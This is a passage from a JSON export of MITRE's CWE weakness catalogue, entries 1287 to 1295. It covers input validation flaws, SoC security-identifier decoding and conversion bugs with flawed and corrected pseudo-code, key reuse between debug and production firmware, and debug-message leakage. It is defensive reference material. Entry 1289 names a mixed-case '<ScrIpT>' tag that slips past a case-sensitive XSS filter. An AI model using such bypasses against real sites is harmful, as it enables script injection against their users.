Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1287":{"attr":{"@_ID":"1287","@_Name":"Improper Validation of Specified Type of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.","Extended_Description":{"xhtml:p":["When input does not comply with the expected type, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities that would not be possible if the input conformed with the expected type.","This weakness can appear in type-unsafe programming languages, or in programming languages that support casting or conversion of an input to another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"843","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1288":{"attr":{"@_ID":"1288","@_Name":"Improper Validation of Consistency within Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.","Extended_Description":{"xhtml:p":"Some input data can be structured with multiple elements or fields that must be consistent with each other, e.g. a number-of-items field that is followed by the expected number of elements. When such complex inputs are inconsistent, attackers could trigger unexpected errors, cause incorrect actions to take place, or exploit latent vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16733","Description":"product does not validate that the start block appears before the end block","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16733"},{"Reference":"CVE-2006-3790","Description":"size field that is inconsistent with packet size leads to buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3790"},{"Reference":"CVE-2008-4114","Description":"system crash with offset value that is inconsistent with packet size","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1289":{"attr":{"@_ID":"1289","@_Name":"Improper Validation of Unsafe Equivalence in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value.","Extended_Description":{"xhtml:p":"Attackers can sometimes bypass input validation schemes by finding inputs that appear to be safe, but will be dangerous when processed at a lower layer or by a downstream component. For example, a simple XSS protection mechanism might try to validate that an input has no \\"<script>\\" tags using case-sensitive matching, but since HTML is case-insensitive when processed by web browsers, an attacker could inject \\"<ScrIpT>\\" and trigger XSS."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"178","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0269","Description":"File extension check in forum software only verifies extensions that contain all lowercase letters, which allows remote attackers to upload arbitrary files via file extensions that include uppercase letters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0269"},{"Reference":"CVE-2001-1238","Description":"Task Manager does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1238"},{"Reference":"CVE-2004-2214","Description":"HTTP server allows bypass of access restrictions using URIs with mixed case.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2214"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1290":{"attr":{"@_ID":"1290","@_Name":"Incorrect Decoding of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections.","A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent\u2019s security identifier is decoded into a trusted agent\u2019s security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design consistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that has four bus masters and a decoder. The table below provides bus masters as well as their security identifiers and trust assumptions:","The decoder is supposed to decode every bus transaction and assign a corresponding security identifier. The security identifier is used to determine accesses to the assets.","The bus transaction that contains the security information is Bus_transaction [15:14], and the bits 15 through 14 contain the security identifier in formation.","The assets are the AES-Key register\u2019s AES key for encryption or decryption. The key is128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.\\nThe access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The size of the security identifier is 4 bits (i.e., bit 3 through 0. Each bit in these 4 bits defines a security identifier. There are only 4 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent."],"xhtml:table":[{"xhtml:tr":[{"xhtml:td":["Bus Master","Security Identifier Decoding","Trust Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:td":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption\\nDefault 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000\\n[3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}],"xhtml:br":"","xhtml:div":{"#text":"Pseudo CodeIf (AES_KEY_ACCESS_POLICY[Security_Identifier] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Below is a decoder\u2019s Pseudo code that only checks for bit [14] of the bus transaction to determine what Security Identifier it must assign.If (Bus_transaction[14] == \u201c1\u201d)Else","xhtml:br":["","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"The decoder should check for the entire size of the security identifier in the bus-transaction signal to assign a corresponding security identifier. The following is good Pseudo code:If (Bus_transaction[15:14] == \u201c00\u201d)If (Bus_transaction[15:14] == \u201c01\u201d)If (Bus_transaction[15:14] == \u201c10\u201d)If (Bus_transaction[15:14] == \u201c11\u201d)","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"Security_Identifier == \u201c0\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c1\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c2\u201d","attr":{"@_style":"margin-left:10px;"}},{"#text":"Security_Identifier == \u201c3\u201d","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"Upon close observation of the security identifiers and the above code, it looks like the Master_3, an untrusted agent, has access to the AES-Key registers in addition to the intended trusted Master_1 because both have their bit \u201c0\u201d set to \u201c1\u201d."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1291":{"attr":{"@_ID":"1291","@_Name":"Public Key Re-Use for Signing both Debug and Production Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The same public key is used for signing both debug and production code.","Extended_Description":{"xhtml:p":["A common usage of public-key cryptography is to verify the integrity and authenticity of another entity (for example a firmware binary). If a company wants to ensure that its firmware runs only on its own hardware, before the firmware runs, an encrypted hash of the firmware image will be decrypted with the public key and then verified against the now-computed hash of the firmware image. This means that the public key forms the root of trust, which necessitates that the public key itself must be protected and used properly.","During the development phase, debug firmware enables many hardware debug hooks, debug modes, and debug messages for testing. Those debug facilities provide significant, additional views about the firmware\u2019s capability and, in some cases, additional capability into the chip or SoC. If compromised, these capabilities could be exploited by an attacker to take full control of the system.","Once the product exits the manufacturing stage and enters production, it is good practice to use a different public key. Debug firmware images are known to leak. With the debug key being reused as the production key, the debug image will also work on the production image. Thus, it will open all the internal, debug capabilities to the attacker.","If a different public key is used for the production image, even if the attacker gains access to the debug firmware image, they will not be able to run it on a production machine. Thus, damage will be limited to the intellectual property leakage resulting from the debug image."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"321","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation","Other"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Varies by Context"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Compare the debug key with the production key to make sure that they are not the same."},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use different keys for Production and Debug"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example illustrates the danger of using the same public key for debug and production.","Example_Code":[{"#text":"Suppose the product design requires frugality of silicon real estate. Assume that originally the architecture allows just enough storage for two 2048-bit RSA keys in the fuse: one to be used for debug and the other for production. However, in the meantime, a business decision is taken to make the security future-proof beyond 2030, which means the architecture needs to use the NIST-recommended 3072-bit keys instead of the originally-planned 2048-bit keys. This means that, at most, one key can be fully stored in the fuses, not two. So the product design team decides to use the same public key for debug and production.","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":""},{"#text":"Increase the storage so that two different keys of the required size can be stored.","attr":{"@_Nature":"informative","@_Language":"Other"},"xhtml:div":""}]}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-26"}}},"1292":{"attr":{"@_ID":"1292","@_Name":"Incorrect Conversion of Security Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a conversion mechanism to map certain bus-transaction signals to security identifiers. However, if the conversion is incorrectly implemented, untrusted agents can gain unauthorized access to the asset.","Extended_Description":{"xhtml:p":["In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. This security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes).","A typical bus connects several leader and follower agents. Some follower agents implement bus protocols differently from leader agents. A protocol conversion happens at a bridge to seamlessly connect different protocols on the bus. One example is a system that implements a leader with the Advanced High-performance Bus (AHB) protocol and a follower with the Open-Core Protocol (OCP). A bridge AHB-to-OCP is needed to translate the transaction from one form to the other.","A common weakness that can exist in this scenario is that this conversion between protocols is implemented incorrectly, whereupon an untrusted agent may gain unauthorized access to an asset."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security identifier decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system that supports AHB. Let us assume we have a follower agent that only understands OCP. To connect this follower to the leader, a bridge is introduced, i.e., AHB to OCP.","The follower has assets to protect accesses from untrusted leaders, and it employs access controls based on policy, (e.g., AES-Key registers for encryption or decryption). The key is 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.","The AES_KEY_ACCESS_POLICY access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. The implemented AES_KEY_ACCESS_POLICY has 4 bits where each bit when \u201cSet\u201d allows access to the AES-Key registers to the corresponding agent that has the security identifier. The other bits from 31 through 4 are reserved and not used.","During conversion of the AHB-to-OCP transaction, the security identifier information must be preserved and passed on to the follower correctly."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["Register","Field Description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption Default 0x00000000"]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:4] Default 0x000000 [3:0] \u2013 0x02 agent with Security Identifier \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}]}},"Example_Code":[{"#text":"In AHB-to-OCP bridge, the security identifier information conversion is done incorrectly.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The conversion of the signals from one protocol (AHB) to another (OCP) must be done while preserving the security identifier correctly.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"Because of the incorrect conversion, the security identifier information is either lost or could be modified in such a way that an untrusted leader can access the AES-Key registers."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"629"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1293":{"attr":{"@_ID":"1293","@_Name":"Missing Source Correlation of Multiple Independent Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software relies on one source of data, preventing the ability to detect if an adversary has compromised a data source.","Extended_Description":{"xhtml:p":"Software has to implicitly trust the integrity of an information source. When information is implicitly signed, one can ensure that the data was not tampered in transit. This does not ensure that the information source was not compromised when responding to a request. By requesting information from multiple sources, one can check if all of the data is the same. If they are not, the system should report the information sources that respond with a different or minority value as potentially compromised. If there are not enough answers to provide a majority or plurality of responses, the system should report all of the sources as potentially compromised. As the seriousness of the impact of incorrect integrity increases, so should the number of independent information sources that would need to be queried."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"654","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This flaw could be introduced during the design of the application or misconfiguration at run time by only specifying a single point of validation."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."},{"Phase":"Operation","Note":"This weakness could be introduced by intentionally failing all but one of the devices used to retrieve the data or by failing the devices that validate the data."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker that may be able to execute a single Person-in-the-Middle attack can subvert a check of an external oracle (e.g. the ACME protocol check for a file on a website), and thus inject an arbitrary reply to the single perspective request to the external oracle."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Design system to use a Practical Byzantine fault method, to request information from multiple sources to verify the data and report on potentially compromised information sources."},{"Phase":"Implementation","Description":"Failure to use a Practical Byzantine fault method when requesting data. Lack of place to report potentially compromised information sources. Relying on non-independent information sources for integrity checking. Failure to report information sources that respond in the minority to incident response procedures."}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1125"}},{"attr":{"@_External_Reference_ID":"REF-1126"}},{"attr":{"@_External_Reference_ID":"REF-1127"}}]},"Content_History":{"Submission":{"Submission_Name":"Kurt Seifried","Submission_Organization":"Cloud Security Alliance","Submission_Date":"2020-04-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"}}},"1294":{"attr":{"@_ID":"1294","@_Name":"Insecure Security Identifier Mechanism","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.","Extended_Description":{"xhtml:p":["Systems-On-Chip (Integrated circuits and hardware\\n engines) implement Security Identifiers to\\n differentiate/identify actions originated from various\\n agents. These actions could be \'read\', \'write\', \'program\',\\n \'reset\', \'fetch\', \'compute\', etc. Security identifiers are\\n generated and assigned to every agent in the System (SoC)\\n that is either capable of generating an action or receiving\\n an action from another agent. Every agent could be assigned\\n a unique, Security Identifier based on its trust level or\\n privileges.","A broad class of flaws can exist in the Security\\n Identifier process, including but not limited to missing\\n security identifiers, improper conversion of security\\n identifiers, incorrect generation of security identifiers,\\n etc."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design, then identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware implementation, then identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Security Identifier Decoders must be reviewed for design inconsistency and common weaknesses."},{"Phase":"Implementation","Description":"Access and programming flows must be tested in pre-silicon and post-silicon testing."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-07-17"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1295":{"attr":{"@_ID":"1295","@_Name":"Debug Messages Revealing Unnecessary Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages.","Extended_Description":{"xhtml:p":"Debug messages are messages that help troubleshoot an issue by revealing the internal state of the system. For example, debug data in design can be exposed through internal memory array dumps or boot logs through interfaces like UART via TAP commands, scan chain, etc. Thus, the more information contained in a debug message, the easier it is to debug. However, there is also the risk of revealing information that could help an attacker either decipher a vulnerability, and/or gain a better understanding of the system. Thus, this extra information could lower the \u201csecurity by obscurity\u201d factor. While \u201csecurity by obscurity\u201d alone is insufficient, it can help as a part of 